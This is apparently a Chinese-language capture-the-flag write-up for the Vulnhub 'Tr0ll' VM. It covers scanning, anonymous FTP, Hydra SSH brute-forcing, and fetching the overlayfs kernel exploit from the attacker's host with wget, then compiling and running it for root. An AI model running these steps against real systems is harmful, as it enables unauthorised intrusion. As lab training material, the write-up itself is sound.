文章目录
Description
Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.
The goal is simple, gain root and get Proof.txt from the /root directory.
Not for the easily frustrated! Fair warning, there be trolls ahead!
Difficulty: Beginner ; Type: boot2root
Special thanks to @OS_Eagle11 and @superkojiman for suffering through the testing all the way to root!
The machine should pull an IP using DHCP, if you have any problems, contact me for a password to get it to working.
Feedback is always appreciated!
说明
Tr0ll的灵感来自OSCP实验室内机器的不断拖动。
目标很简单,获取root并从/root目录获取Proof.txt。
不适合容易受挫的人!公平的警告,前方有巨魔!
难度:初学者;类型:boot2root
特别感谢@OS_Eagle11和@supernojiman一路忍受着测试的痛苦!
机器应该使用DHCP拉取IP,如果您有任何问题,请联系我获取密码以使其正常工作。
我们始终感谢您的反馈!
bash
└─# nmap -p- -Pn -A 192.168.1.170 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 10:54 CST
Nmap scan report for 192.168.1.170
Host is up (0.00056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
# ftp匿名登录
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.99
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
# 控制连接是以明文形式进行的
| Control connection is plain text
# 数据连接也是明文
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms 192.168.1.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.42 seconds试试TCP、UDP扫描,没啥东西
bash
└─# nmap -sT 192.168.1.170 -p- --min-rate 10000 -oA tcpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 10:47 CST
Nmap scan report for 192.168.1.170
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
└─# nmap -sU 192.168.236.136 --min-rate 10000 -Pn -p- -oA udpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 10:52 CST
Nmap scan report for 192.168.236.136
Host is up.
All 65535 scanned ports on 192.168.236.136 are in ignored states.
Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 27.94 seconds脆弱性扫描
bash
└─# nmap 192.168.1.170 --script vuln -o scriptvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 11:07 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.170
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap done: 1 IP address (1 host up) scanned in 345.77 seconds从最初的nmap扫描中得知ftp匿名登录,用户名为anonymous,密码为空。拿到一个数据包
bash
└─# ftp 192.168.1.170
Connected to 192.168.1.170.
220 (vsFTPd 3.0.2)
Name (192.168.1.170:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||55380|).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||25791|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |*********************************************************************************************************************************************************| 8068 730.27 KiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (703.15 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[~/Vulnhub/Tr0ll]
└─# ls
lol.pcapWireShark分析流量包
bash
# 跟踪FTP协议相关流量的TCP流,发现secret_stuff.txt
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
226 Transfer complete.
# 右下角切换到stream 2,得到具体内容,提示了sup3rs3cr3tdirlol目录
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!通过dirsearch扫描目录得到robots.txt
bash
User-agent:*
# 访问是一张很欠的图片,u mad?
Disallow: /secret访问sup3rs3cr3tdirlol目录,可以下载名为roflmao的文件。cat是一堆乱码,用strings从二进制文件中提取可打印的字符序列
└─# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
#
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
roflmao.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
_edata
_fini
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
根据字符中的提示访问0x0856BF,两个文件which_one_lol.txt Pass.txt
bash
└─# cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
└─# cat Pass.txt
Good_job_:)hydra爆破SSH
bash
# 不太行的样子
└─# hydra -L which_one_lol.txt -P Pass.txt 192.168.1.170 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 17:30:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.170:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 17:30:46
# 将密码换成文件名本身后成功
┌──(root㉿kali)-[~/Vulnhub/Tr0ll]
└─# hydra -L which_one_lol.txt -p Pass.txt 192.168.1.170 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 17:31:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.170:22/
#
[22][ssh] host: 192.168.1.170 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-19 17:31:55
bash
└─$ ssh overflow@192.168.1.170
overflow@192.168.1.170's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ 查询是否有python环境dpkg -l | grep python,有的,使用python改善交互shell
bash
$ python -c 'import pty;pty.spawn("/bin/bash")'
overflow@troll:/$ 提权
bash
# find看起来不太好提权
overflow@troll:/$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/su
/bin/ping
/bin/fusermount
/bin/ping6
/bin/mount
/bin/umount
# 该用户无法使用sudo
overflow@troll:/$ sudo -l
sudo: unable to resolve host troll
[sudo] password for overflow:
Sorry, user overflow may not run sudo on troll.
# 查看内核版本
overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
$ cat /etc/os-release
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"寻找内核payload
bash
└─# searchsploit Linux 3.13.0 --id
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | 37292
└─# searchsploit 37292 -p
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-2015-1328
Verified: True
File Type: C source, ASCII text, with very long lines (466)
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./exploit.c
# 当然也可以这样
└─# searchsploit -m 37292.c
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-2015-1328
Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /root/Vulnhub/Tr0ll/37292.c
┌──(root㉿kali)-[~/Vulnhub/Tr0ll]
└─# ls
37292.c python起web服务供靶机下载exp
└─# python -m http.server 8888
下载、编译并使用
bash
$ pwd
/tmp
$ wget http://192.168.1.247:8888/exploit.c
--2025-03-07 00:56:33-- http://192.168.1.247:8888/exploit.c
Connecting to 192.168.1.247:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: 'exploit.c'
100%[==========================================================================================================================================================>] 4,968 --.-K/s in 0s
2025-03-07 00:56:33 (564 MB/s) - 'exploit.c' saved [4968/4968]
$ ls
exploit.c
$ gcc exploit.c -o exp
$ ls
exp exploit.c
$ chmod +x exp
$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
# cd /root
# ls
proof.txt
# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc